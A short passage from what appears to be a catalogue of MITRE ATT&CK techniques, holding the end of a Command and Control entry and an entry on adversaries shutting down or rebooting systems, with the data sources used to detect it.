Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre